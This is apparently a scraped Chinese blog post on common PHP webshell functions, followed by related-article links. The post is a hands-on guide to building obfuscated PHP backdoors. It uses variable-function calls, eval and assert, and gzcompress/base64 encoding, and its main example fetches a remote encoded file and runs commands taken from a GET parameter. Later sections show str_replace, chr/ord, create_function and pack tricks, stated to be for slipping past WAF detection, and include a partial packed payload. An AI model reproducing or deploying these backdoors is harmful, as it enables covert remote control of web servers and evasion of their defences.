php webshell常见函数
0x1
直接在字符串变量后面加括号, 会调用这个函数:
<?php
$s = 'system';
$e = 'assert';
$s('whoami');
$e('phpinfo();');
0x2
执行命令常用的函数有:
system('命令')
eval('php code')
assert('php code')
这三个最常用
0x3
base64_encode/base64_decode
<?php
$b = base64_encode('whoami');
echo $b.'<br />';
echo base64_decode($b).'<br />';
0x4
gzcompress/gzuncompress 压缩数据
<?php
$c = gzcompress('whoami');
echo $c.'<br>';
echo gzuncompress($c)."<br />";
0x5
从上面的命令执行, base64加解64编码与gz压缩, 我们可以写一个这样的后门。
先把后门压缩, 再把后门base64_encode(base64编码后防止字符原因代码出错)。
如果后门是一个php代码的话, 在最后我们可以用assert或eval执行它。
在php中, 有一个这样的函数:
file_get_contents(url)
用这个函数可以远程获取文件内容保存到变量中:
$shell = file_get_contents('http://localhost/shell.jpg')
开始测试, 从最简单例子开始。
制作gzcompress与base64_encode编码过的文件:
<?php
$c = 'system';
$data = gzcompress($c);
$file_data = base64_encode($data);
echo $file_data;
fwrite(fopen('shell.txt', 'w'), $file_data);
这样我们就创了一个压缩后再64编码的system字符串
使用:
<?php
$c = file_get_contents('http://localhost/shell.txt');
#获取数据
$s = gzuncompress(base64_decode($c));
#解密数据 $s($_GET[session]);
#执行命令
那么问题来了, 我们为什么要转了一大圈再回来呢?
原因很简单, 就是你压缩后的数据, 有可能一些WAF并不会检测到内容存在危险。
0x6
ascii转码函数: chr/ord
<?php
$str = 'system';
for($count = 0; $count < strlen($str); $count++){
echo substr($str, $count, 1).'~'.ord(substr($str, $count, 1)).'<br />';
}
/*
s~115
y~121
s~115
t~116
e~101
m~109*/
0x7
str_replace字符替换函数:
<?php
$s = str_replace('p','','pspypsptpepmp');
echo $s;
#system
0x8
create_fuction()创建匿名函数:
<?php
#create_function('参数列表', 'php代码字符串');
$info = create_function('','phpinfo();');
$info();
0x9
pack函数
pack('格式', 十六进制字符串)
pack函数有点复杂, 但不常用, 如果你要把一个十六进制转成字符, 可以这样:
<?php
$x = bin2hex('system');
$s = PACK('H*', $x);
echo $s.'<br />';
$s('whoami');
pack关键用法就是, 我们可以把一些第感的函数, 先转成16进制, 再 pack回来。
比如, create_function('', $shell)中, $shell为php code代码, 我们可以在php code中利用隐藏一些敏感函数。
<?php
$shell=PACK('H*','2470617373776F72643D27').$password.
PACK('H*','273B247368656C6C6E616D653D27').$Username.
PACK('H*','273B246D7975726C3D27').$Url.
PACK('H*','273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827').'
eJzs/Xt3HNd5Jor/zazl71Buw2rAwqXu1UUQsOpKgheABEBSlK
iD02g0gCYaaKi7QYCi+GEczZxoHM+KJetiWzdbkmNZsi1FkmXH
yzOT8WQyk/HPcybJTJKZJLN+z7N3VXVVX0BQtpPJOoZEoLtq3/
d73+/77tb6WqdbbXfHJ2Y/8zsb9c3GXn28vHunurHRrnc65cmx
tZVo+Vq0/Hh5JVheuLy6Fi9cjBa9S1H5iXyN/Vanu18VFfjnsN
XeyL/ubNebzb3qbh3vs8/FHg/aTbwUf/misTn+yFa9u7Zb3WrU
....... $f = create_function('', $shell);
$f();
pack用法可以参孝一下这里: perl pack
总结
创建一个gz压缩再base64编码的文件(如 logo.png), 利用file_get_contents获取。
利用str_replace/chr/ord/create_fuction函数绕过一些WAF检测。
php webshell常见函数的更多相关文章
- [转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没
起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(); ...
- Java类WebServer及中间件拿webshell方法总结
0.序 原文名称:Tomcat.Weblogic.JBoss.GlassFish.Resin.Websphere弱口令及拿webshell方法总结 原文from:http://www.hack80.c ...
- 一篇说尽Excel常见函数用法
一篇说尽Excel常见函数用法 Word,PPT,Excel这三个Office软件是职场办公里最常用的三个软件,但是我发现简书上写PPT的教程多,Excel的少,即使有,也是零零散散.因为Excel的 ...
- WebLogic 12c控制台上传获取webshell
WebLogic 默认端口7001,一般可以通过这样来访问 http://10.9.1.1:7001/console 控制台 通过弱口令weblogic/weblogic登录控制台,下一步获取如何上传 ...
- 利用网络流传的WebShell默认密码库寻找WebShell
声明:本文提到的技术,仅可用作网络安全加固等合法正当目的.本文作者无法鉴别判断读者阅读本文的真实目的,敬请读者在本国法律所允许范围内阅读本文,读者一旦因非法使用本文提到技术而违反国家相关的法律法规,所 ...
- 各种隐藏 WebShell、创建、删除畸形目录、特殊文件名、黑帽SEO作弊(转自核大大)
其实这个问题,经常有朋友问我,我也都帮大家解决了…… 但是现在这些现象越来越严重,而且手法毒辣.隐蔽.变态,清除了又来了,删掉了又恢复了,最后直接找不到文件了,但是访问网站还在,急的各大管理员.站长抓 ...
- 当一名黑客获得一份WebShell后,会做什么
当你获得一份webshell后,你会干嘛? 我曾获得N多webshell.什么discuz.dedecms.phpwind.phpweb.aspcms等等,甚至还包括N多自己研发的线上平台. 可是,问 ...
- Deformity JSP Webshell、Webshell Hidden Learning
catalogue . JSP基础语法 . JSP Lexer By Lua . Open Source Code Analyzers in Java . WEBSHELL Samples . she ...
- Deformity ASP/ASPX Webshell、Webshell Hidden Learning
catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...
随机推荐
- [计算机网络-数据链路层] CSMA、CSMA/CA、CSMA/CD详解
1.CSMA(载波侦听多路访问协议) CSMA 当其他节点检测到信道被占用时不发送数据.但是当数据发送完后其他节点同时检测到信道为空闲,之后又在同一时刻发送数据,可能再次产生冲突. 2.CSMA/CD ...
- SpringMVC Ajax两种传参方式
1.采用@RequestParam或Request对象获取参数的方法 注:contentType必须指定为:application/x-www-form-urlencoded @ResponseBod ...
- 学习Python最好的方法就是实践和教程并行,以下有一些资源和教程,还有一些学习思维导图:
1.Python 的 14 张思维导图下载地址: https://woaielf.github.io/2017/06/13/python3-all/ 2.Python基础教程|菜鸟教程: http:/ ...
- BZOJ4922 Karp-de-Chant Number(贪心+动态规划)
首先将每个括号序列转化为三元组(ai,bi,ci),其中ai为左括号-右括号数量,bi为前缀最小左括号-右括号数,ci为序列长度.问题变为在满足Σai=0,bi+Σaj>=0 (j<i)的 ...
- 20165218 2017-2018-2 《Java程序设计》课程总结
20165218 2017-2018-2 <Java程序设计>课程总结 一.每周作业链接汇总 20165218 我期望的师生关系 20165218 学习基础和C语言基础调查 2016521 ...
- SQLite中的自增关键字:AUTO_INCREMENT、INTEGER PRIMARY KEY与AUTOINCREMENT
1.SQLite不支持关键字AUTO_INCREMENT 1)AUTO_INCREMENT不生效的问题 SQL语句: CREATE TABLE todo ( id INTEGER AUTO_I ...
- 升级系统后maxvim不能用,重新下载编译个
1. 获取macvim源代码git clone https://github.com/b4winckler/macvim.git 2 配置及编译 编译选项 ./configure --with-fea ...
- 【arc080F】Prime Flip
Portal --> arc080_f Solution 这题的话..差分套路题(算吗?反正就是想到差分就很好想了qwq) (但是问题就是我不会这种套路啊qwq题解原话是:&quo ...
- 使用log4net将日志文件输出为csv格式
我们在编写程序时,会在程序运行过程中记录一些日志.log4net作为一款经久耐用的日志组件,值得我们信赖.在中小型公司中,往往没有专业的日志服务器来处理应用程序产生的日志,而格式化不好的日志文件又为上 ...
- 使用Hexo写博客
首先,你需要搭建一个Hexo博客网站- 使用Hexo搭建GitHub博客(2018年Mac版) 原生方式新建文章 Hexo的项目结构是在网站根目录的source/_posts目录下存放你的博客文档,以 ...